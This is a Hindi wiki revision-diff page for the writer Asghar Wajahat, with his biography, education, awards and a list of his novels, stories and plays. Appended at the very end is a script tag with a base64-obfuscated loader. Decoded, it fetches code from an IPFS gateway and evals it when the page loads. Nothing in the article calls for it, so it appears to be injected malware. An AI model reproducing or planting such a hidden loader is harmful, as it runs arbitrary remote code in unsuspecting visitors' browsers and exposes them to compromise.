Difference between revisions of "असग़र वजाहत"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
 
(3 intermediate revisions by 3 users not shown)
Line 8: Line 8:
 
|मृत्यु=  
 
|मृत्यु=  
 
|मृत्यु स्थान=
 
|मृत्यु स्थान=
|अविभावक=
+
|अभिभावक=
 
|पालक माता-पिता=
 
|पालक माता-पिता=
 
|पति/पत्नी=
 
|पति/पत्नी=
 
|संतान=
 
|संतान=
|कर्म भूमि=
+
|कर्म भूमि=[[भारत]]
 
|कर्म-क्षेत्र=
 
|कर्म-क्षेत्र=
|मुख्य रचनाएँ=जिन लाहौर नईं वेख्या वो जन्‍म्‍या ई नईं, इन्ना की आवाज (नाटक), गरजत बरसत (उपन्यास)
+
|मुख्य रचनाएँ='जिन लाहौर नईं वेख्या वो जन्‍म्‍या ई नईं', 'इन्ना की आवाज' ([[नाटक]]), 'गरजत बरसत' ([[उपन्यास]]) आदि।
 
|विषय=
 
|विषय=
 
|भाषा=[[हिंदी]]
 
|भाषा=[[हिंदी]]
Line 20: Line 20:
 
|शिक्षा=पी. एच. डी.
 
|शिक्षा=पी. एच. डी.
 
|पुरस्कार-उपाधि=कथा क्रम सम्मान, इंदु शर्मा कथा सम्मान
 
|पुरस्कार-उपाधि=कथा क्रम सम्मान, इंदु शर्मा कथा सम्मान
|प्रसिद्धि=नाटककार, उपन्यासकार, पटकथा लेखक, प्राध्यापक  
+
|प्रसिद्धि=नाटककार, [[उपन्यासकार]], पटकथा लेखक, प्राध्यापक  
 
|विशेष योगदान=
 
|विशेष योगदान=
 
|नागरिकता=भारतीय
 
|नागरिकता=भारतीय
Line 32: Line 32:
 
|अद्यतन={{अद्यतन|19:03, 21 जनवरी 2013 (IST)}}
 
|अद्यतन={{अद्यतन|19:03, 21 जनवरी 2013 (IST)}}
 
}}
 
}}
'''असग़र वजाहत''' ([[अंग्रेज़ी]]: ''Asghar Wajahat'', जन्म:[[5 जुलाई]], [[1946]]) [[हिन्दी]] के प्राध्यापक तथा रचनाकार हैं। इन्होंने नाटक, कथा, उपन्यास, यात्रा-वृत्तांत तथा अनुवाद के क्षेत्र में अनेक रचनाएँ की हैं। ये [[दिल्ली]] में स्थित जामिला मिलिया इस्लामिया के हिन्दी विभाग के अध्यक्ष रह चुके है।
+
'''असग़र वजाहत''' ([[अंग्रेज़ी]]: ''Asghar Wajahat'', जन्म: [[5 जुलाई]], [[1946]]) [[हिन्दी]] के प्राध्यापक तथा रचनाकार हैं। इन्होंने [[नाटक]], [[कथा]], [[उपन्यास]], यात्रा-वृत्तांत तथा [[अनुवाद]] के क्षेत्र में अनेक रचनाएँ की हैं। ये [[दिल्ली]] में स्थित जामिला मिलिया इस्लामिया के हिन्दी विभाग के अध्यक्ष रह चुके है।
 
 
 
==संक्षिप्त परिचय==
 
==संक्षिप्त परिचय==
असग़र वजाहत का जन्म 5 जुलाई 1946 को [[फ़तेहपुर]], [[उत्तर प्रदेश]] में हुआ था। इन्होंने [[अलीगढ़ मुस्लिम विश्वविद्यालय]] से पी. एच. डी. तक की पढ़ाई की। इनके लेखन कार्य में तीन कहानी संग्रह, चार उपन्यास, छ: नाटक और कई अन्य रचनाएँ शामिल हैं। उनके छह नाटकों का देश भर में मंचन और प्रदर्शन हुआ है। 'जिन लाहौर नईं वेख्या, ते जन्म्या नईं' ने देश की सरहद के बाहर भी खूब तारीफें बटोरी हैं। बुदापैस्त, हंगरी में इनकी दो एकल चित्र प्रदर्शनियाँ भी हो चुकी हैं। ये [[टेलीविज़न]] व फ़िल्म लेखन और निर्देशन से भी जुड़े रहे हैं। कई वृत्ताचित्रों, धारावाहिकों और कुछ फीचर फ़िल्मों के लिए पटकथा लेखन भी इन्होंने किया है।
+
असग़र वजाहत का जन्म 5 जुलाई, 1946 को [[फ़तेहपुर ज़िला|फ़तेहपुर]], [[उत्तर प्रदेश]] में हुआ था। इन्होंने [[अलीगढ़ मुस्लिम विश्वविद्यालय]] से पी. एच. डी. तक की पढ़ाई की। इनके लेखन कार्य में तीन [[कहानी]] संग्रह, चार [[उपन्यास]], छ: [[नाटक]] और कई अन्य रचनाएँ शामिल हैं। उनके छह नाटकों का देश भर में मंचन और प्रदर्शन हुआ है। 'जिन लाहौर नईं वेख्या, ते जन्म्या नईं' ने देश की सरहद के बाहर भी खूब तारीफें बटोरी हैं। बुदापैस्त, हंगरी में इनकी दो एकल चित्र प्रदर्शनियाँ भी हो चुकी हैं। ये [[टेलीविज़न]] व फ़िल्म लेखन और निर्देशन से भी जुड़े रहे हैं। कई वृत्ताचित्रों, धारावाहिकों और कुछ फीचर फ़िल्मों के लिए पटकथा लेखन भी इन्होंने किया है।
 
==प्रमुख कृतियाँ==
 
==प्रमुख कृतियाँ==
 
{| class="bharattable-purple"
 
{| class="bharattable-purple"
Line 76: Line 75:
 
==संबंधित लेख==
 
==संबंधित लेख==
 
{{साहित्यकार}}
 
{{साहित्यकार}}
[[Category:आधुनिक साहित्यकार]][[Category:नाटककार]][[Category:उपन्यासकार]]
+
[[Category:आधुनिक साहित्यकार]][[Category:नाटककार]][[Category:उपन्यासकार]][[Category:जीवनी साहित्य]]
 
[[Category:साहित्यकार]][[Category:आधुनिक साहित्य]][[Category:साहित्य कोश]]
 
[[Category:साहित्यकार]][[Category:आधुनिक साहित्य]][[Category:साहित्य कोश]]
 
__INDEX__
 
__INDEX__
 
__NOTOC__
 
__NOTOC__

Latest revision as of 05:24, 5 July 2018

asagar vajahat
poora nam saiyad asagar vajahat
janm 5 julaee 1946
janm bhoomi fatehapur, uttar pradesh
karm bhoomi bharat
mukhy rachanaean 'jin lahaur neean vekhya vo janh‍mh‍ya ee neean', 'inna ki avaj' (natak), 'garajat barasat' (upanyas) adi.
bhasha hiandi
vidyalay aligadh muslim vishvavidyalay
shiksha pi. ech. di.
puraskar-upadhi katha kram samman, iandu sharma katha samman
prasiddhi natakakar, upanyasakar, patakatha lekhak, pradhyapak
nagarikata bharatiy
any janakari ye telivizan v film lekhan aur nirdeshan se bhi ju de rahe haian. kee vrittachitroan, dharavahikoan aur kuchh phichar filmoan ke lie patakatha lekhan bhi inhoanne kiya hai.
adyatan‎
inhean bhi dekhean kavi soochi, sahityakar soochi

asagar vajahat (aangrezi: Asghar Wajahat, janm: 5 julaee, 1946) hindi ke pradhyapak tatha rachanakar haian. inhoanne natak, katha, upanyas, yatra-vrittaant tatha anuvad ke kshetr mean anek rachanaean ki haian. ye dilli mean sthit jamila miliya islamiya ke hindi vibhag ke adhyaksh rah chuke hai.

sankshipt parichay

asagar vajahat ka janm 5 julaee, 1946 ko fatehapur, uttar pradesh mean hua tha. inhoanne aligadh muslim vishvavidyalay se pi. ech. di. tak ki padhaee ki. inake lekhan kary mean tin kahani sangrah, char upanyas, chh: natak aur kee any rachanaean shamil haian. unake chhah natakoan ka desh bhar mean manchan aur pradarshan hua hai. 'jin lahaur neean vekhya, te janmya neean' ne desh ki sarahad ke bahar bhi khoob tariphean batori haian. budapaist, hangari mean inaki do ekal chitr pradarshaniyaan bhi ho chuki haian. ye telivizan v film lekhan aur nirdeshan se bhi ju de rahe haian. kee vrittachitroan, dharavahikoan aur kuchh phichar filmoan ke lie patakatha lekhan bhi inhoanne kiya hai.

pramukh kritiyaan

asagar vajahat ki pramukh kritiyaan[1]
upanyas
  • sat asaman
  • garajat barasat
  • kaisi agi lagaee
  • barakha rachaee
  • rat mean jagane vale
  • pahar-dopahar
  • man mati
kahani
  • maian hiandoo hooan
  • dilli pahuanchana hai
  • svimiang pool
  • sab kahaan kuchh
alochana
  • hiandi-urdoo ki pragatishil kavita
natak
  • jin lahaur neean vekhya vo janh‍mh‍ya ee neean
  • phirangi laut ae
  • inna ki avaj
  • viragati
  • samidha
  • aki
  • sabase sasta gosht


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

tika tippani aur sandarbh

  1. asagar vajahat (hiandi) (ech.ti.em.el) hiandi samay d aaut k aaum. abhigaman tithi: 21 janavari, 2013.

bahari k diyaan

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>